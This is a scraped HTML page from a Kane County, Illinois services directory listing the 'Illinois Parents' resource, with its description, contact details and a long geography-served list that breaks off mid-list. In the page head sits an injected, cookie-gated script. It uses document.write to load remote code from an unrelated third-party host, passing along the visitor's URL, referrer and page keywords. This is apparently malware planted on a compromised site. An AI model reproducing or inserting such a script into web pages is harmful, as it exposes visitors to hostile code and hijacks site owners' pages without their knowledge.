<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" >
  <head>
    <!-- The following JDOC Head tag loads all the header and meta information from your site config and content. -->
      <base href="http://www.kanecountyguide.org/index.php/component/cpx/" />
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="keywords" content="Rent/Rental Assistance/Help,Elgin community services,Elgin help,Elgin resources,Elgin social services,Elgin rent help,Elgin charity,Elgin financial help,Aurora community services,Aurora help,Aurora resources,Aurora social services,Help,Aurora rent help,Aurora charity,Aurora financial help" />
  <meta name="description" content="A Guide to Services in Kane County" />
  <meta name="generator" content="Joomla! - Open Source Content Management" />
  <title>Kane County Guide - Elgin, Aurora</title>
  <link href="/templates/atomic/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
  <link rel="stylesheet" href="http://www.kanecountyguide.org//components/com_cpx/css/cpx.css" type="text/css" />
  <link rel="stylesheet" href="http://www.kanecountyguide.org//components/com_cpx/css/cpx2.css" type="text/css" />
  <link rel="stylesheet" href="http://www.kanecountyguide.org//components/com_cpx/local/override.css" type="text/css" />
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/jquery1_6_2.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/jquery-1.7.1.min.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/jquery-ui-1.8.19.custom.min.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/jq_no_conflict.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/prototype.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/cpx.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/gmap.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/sorttable.js" type="text/javascript"></script>
  <script src="http://www.kanecountyguide.org//components/com_cpx/js/resourceView.js" type="text/javascript"></script>
  <script src="https://maps.googleapis.com/maps/api/js?v=3&amp;key=AIzaSyA9xQwoc2V7N79dvTiqIb714JYYD1IAeZs&amp;sensor=false" type="text/javascript"></script>


    <!-- The following five lines load the Blueprint CSS Framework (http://blueprintcss.org). If you don't want to use this framework, delete these lines. -->
    <link rel="stylesheet" href="/templates/atomic/css/blueprint/screen.css" type="text/css" media="screen, projection" />
    <link rel="stylesheet" href="/templates/atomic/css/blueprint/print.css" type="text/css" media="print" />
    <!--[if lt IE 8]><link rel="stylesheet" href="/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/templates/atomic/css/blueprint/plugins/fancy-type/screen.css" type="text/css" media="screen, projection" />
    <link rel="stylesheet" href="/templates/atomic/css/blueprint/plugins/joomla-nav/screen.css" type="text/css" media="screen" />

    <!-- The following line loads the template CSS file located in the template folder. -->
    <link rel="stylesheet" href="/templates/atomic/css/template.css" type="text/css" />

    <!-- The following four lines load the Blueprint CSS Framework and the template CSS file for right-to-left languages. If you don't want to use these, delete these lines. -->
    
    <!-- The following line loads the template JavaScript file located in the template folder. It's blank by default. -->
    <script type="text/javascript" src="/templates/atomic/js/template.js"></script>
    
<!--[if IE 7]>
<style>
form.search {width:45%;}
td.query_field {text-align:center;}
</style>
<![endif]-->    

    <!-- GOOGLE ANALYTICS -->
    
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-8316406-3']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
    
    <!-- /google analytics -->
    
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bmw-pawelec.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
  <body>
          		<div class="container">
			<!-- The class on the root UL tag was changed to match the Blueprint nav style -->
<ul class="joomla-nav">
<li id="current" class="item10"><a href="/index.php/component/cpx/?Itemid=10" >Home &amp; Find Help</a></li><li class="item3"><a href="/index.php/about-the-guide" >About the Guide</a></li><li class="item4"><a href="/index.php/inclusion--exclusion-statement" >Inclusion / Exclusion Statement</a></li><li class="item6"><a href="/index.php?Itemid=6" >Contact the Kane County Guide</a></li></ul>
		</div>
	
      
        <div id="site_wrapper">
    <div id="banner">
      <!-- <img id="slogan" src="/templates/atomic/images/logo.jpg" alt="Live United logo"/>
      <img id="tiles" src="/templates/atomic/images/tiles.png" alt="tile images" /> -->
    </div>
    <!-- <div id="subHeader" class="clearfix">
      <div class="first"><span>sub-head title here</span></div>
      <div class="second"><a href="/index.php/component/content/article?id=4"></a></div>
      <div class="third"><a href="/index.php/component/content/article?id=5"></a></div>
      <div class="fourth"><a href="/index.php/component/content/article?id=6"></a></div>
    </div> -->

    <div class="container">
      <hr class="space" />
      <!--  <div class="joomla-header span-16 append-1">
        <h1>Kane County Guide - Elgin, Aurora</h1>
      </div> -->
          </div>

    <div class="container">
      <div class="span-22 prepend-1 append-1">
              
        
<div id="system-message-container">
</div>
        <!--           
<div id="system-message-container">
</div>
         -->
        
        


<div id="cpx">
	<div id="com_wrapper">
		<p class="title"><a href="/index.php/component/cpx/">Kane County Guide</a></p>

		<ul id="menu">
            <li class="">
				<a href="/index.php/component/cpx/"><span>Search</span></a>
			</li>

					<li class="active">
				<a href="/index.php/component/cpx/?task=search"><span>Resources</span></a>
			</li>
		
            <li class="">
				<a href="/index.php/component/cpx/?task=services.tree"><span>Services</span></a>
			</li>
			<li class="">
				<a href="/index.php/component/cpx/?task=account"><span>My Account</span></a>
			</li>
                        			<li class="">
				<a href="/index.php/component/cpx/?task=help"><span>Help</span></a>
			</li>
		</ul>

		<p class="subtitle">A Guide to Services in Kane County</p>
<script>
	Event.observe(window, 'load', function() {
				setupMap('gmap', 15, "Illinois Parents", "121 N. Kickapoo Street","Lincoln","IL","62656");
		
			});

	function createGroupHandler(event) {
		x = event.target;
		$$('#create_group div').each(function(el) { el.toggle()});

		if(x.id == 'create_group_link') {
			$('create_group_input').focus();
		}
	}
</script>

<div style="position: relative; margin: 0 0 5px 0; padding-bottom: 5px;">
	<p style="color: #777; padding: 5px; background-color: #FFFBC6; border-bottom: 1px solid #B7B7B7;">
		     		<a href="/index.php/component/cpx/">&laquo; Start new search</a>
     	    </p>

    <p style="position: absolute; top: 5px; right: 10px;">
    	     		<a href="/index.php/component/cpx/?task=resource.edit&amp;id=115545" style="color: #BC001D;">Report incorrect information</a>
                <span style="color: #BC001D;">&nbsp;|&nbsp;</span>
                <a href="/index.php/component/cpx/?task=resource.verify&amp;id=115545" style="color: #BC001D;">Verify information</a>
     	    </p>
</div>

<div id="resource_view">
    <table style="width: 100%;">
 	<tr>
     	<td style="vertical-align: top;">

        <p class="view_label_type_textbox" id="view_label_field_name_top">Full Resource Name:</p><p class="view_type_textbox" id="view_field_name_top">Illinois Parents</p><p class="view_type_address" id="view_field_primaryAddressId">121 N. Kickapoo Street<br/>Lincoln, IL  62656<br/></p><p class="view_type_telephone" id="view_field_primaryTelephone" >(800) 759-1495</p><p class="view_type_url" id="view_field_url"><a target="_blank" href="http://www.illinoisparents.org">www.illinoisparents.org</a></p>

        <div style="padding: 20px 30px 0 0;">
            <div class="xtab">

                <ul>
                                        <li class="active">
                            <a href="/index.php/component/cpx/?task=resource&amp;id=115545&amp;tab=1">
                        Overview                            </a>
                        </li>
                                        <li class="">
                            <a href="/index.php/component/cpx/?task=resource&amp;id=115545&amp;tab=2">
                        Details                            </a>
                        </li>
                                        <li class="">
                            <a href="/index.php/component/cpx/?task=resource&amp;id=115545&amp;tab=3">
                        Contacts                            </a>
                        </li>
                                        <li class="">
                            <a href="/index.php/component/cpx/?task=resource&amp;id=115545&amp;tab=4">
                        Send                            </a>
                        </li>
                                </ul>
                <br />
            </div>

                        <div id="current_tab">

                <p class="view_label_type_textarea" id="view_label_field_description">Description:</p><p class="view_type_textarea" id="view_field_description">Illinois Parents provides resources for families and schools to strengthen school communities.  It is an information service on numerous parenting related topics including child development, child care, and education. Additional information is provided on parenting classes, library services, support groups, services by Illinois county, and statewide telephone hotlines. Web links are provided to local programs, services, and agencies for parents. Joint project of Illinois State Board of Education, Academic Development Institute and Early Childhood and Parenting Collaborative of the University of Illinois. Spanish option on web site.</p><div style="margin-bottom: 10px;"><p class="view_label_type_service_list" id="view_label_field_primaryServices" >Primary Services:</p><ul><li class="view_type_service_list" id="view_field_primaryServices" ><p><a id="toggleDetailsLink10238" title="Toggle Service Details" href="javascript:toggleServiceDetailsList(10238, 'Parenting Materials')">Parenting Materials</a>&nbsp;&nbsp;<a href="/index.php/component/cpx/?task=services.code&amp;code=PH-6100.6700" style="font-size: 0.9em;" >[Show Definition Details]</a><div id="serviceDetailsList10238" class="div_service_details" style="display: none; visibility: hidden; margin: 5px 0 5px 10px;" ><div style="margin-bottom: 10px"><span style="font-weight: bold;">Geography Served</span><div style="margin-left: 15px;"><div style="width: 90%; border-left: 1px solid #AAA; padding-left: 3px; margin-bottom: 10px;"><table style="width: 100%"><tr><td><ul><li><p style="font-weight: bold; border-bottom: 1px dotted #CCC; font-size: .9em;">Illinois</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Adams</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Alexander</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bond</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Boone</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Brown</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bureau</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Calhoun</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Carroll</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Cass</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Champaign</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Christian</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clark</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clay</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clinton</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Coles</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Cook</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Crawford</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Cumberland</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Dekalb</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Dewitt</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Douglas</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Dupage</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Addison</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Aurora</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bartlett</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bensenville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bloomingdale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Carol Stream</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clarendon Hills</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Darien</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Downers Grove</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Elmhurst</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Eola</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Fox Valley</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Glendale Heights</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Glen Ellyn</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hinsdale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Itasca</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lisle</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lombard</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Medinah</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Naperville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Oak Brook</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Roselle</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Villa Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Warrenville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wayne</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">West Chicago</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Westmont</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wheaton</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Willowbrook</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Winfield</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wood Dale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Woodridge</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Edgar</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Edwards</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Effingham</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Fayette</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Ford</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Franklin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Fulton</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Gallatin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Greene</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Grundy</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hamilton</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hancock</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hardin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Henderson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Henry</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Iroquois</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jackson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jasper</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jefferson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jersey</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jo Daviess</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Johnson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kane</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kankakee</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Aroma Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bonfield</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bourbonnais</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bradley</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Buckingham</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Essex</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Grant Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Herscher</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hopkins Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kankakee</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Manteno</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Momence</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Reddick</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Saint Anne</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Union Hill</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kendall</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Knox</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lake</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">La Salle</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lawrence</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lee</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Livingston</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Logan</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Macon</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Macoupin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Madison</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Marion</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Marshall</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mason</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Massac</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Brookport</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Joppa</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Metropolis</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mcdonough</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mchenry</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mclean</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Menard</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mercer</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Monroe</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Montgomery</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Morgan</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Moultrie</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Ogle</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Peoria</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Perry</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Piatt</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pike</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pope</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pulaski</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Putnam</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Randolph</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Richland</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Rock Island</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Saint Clair</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Saline</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Sangamon</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Schuyler</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Browning</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Camden</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Frederick</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Huntsville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Littleton</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Rushville</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Scott</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Shelby</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Stark</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Stephenson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Tazewell</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Armington</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Creve Coeur</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Deer Creek</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Delavan</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">East Peoria</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Green Valley</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Groveland</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hopedale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mackinaw</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Minier</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Morton</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pekin</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">South Pekin</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Tremont</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Washington</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Union</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Vermilion</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wabash</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Warren</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Washington</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wayne</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">White</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Whiteside</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Will</p><ul><li><p style="margin: 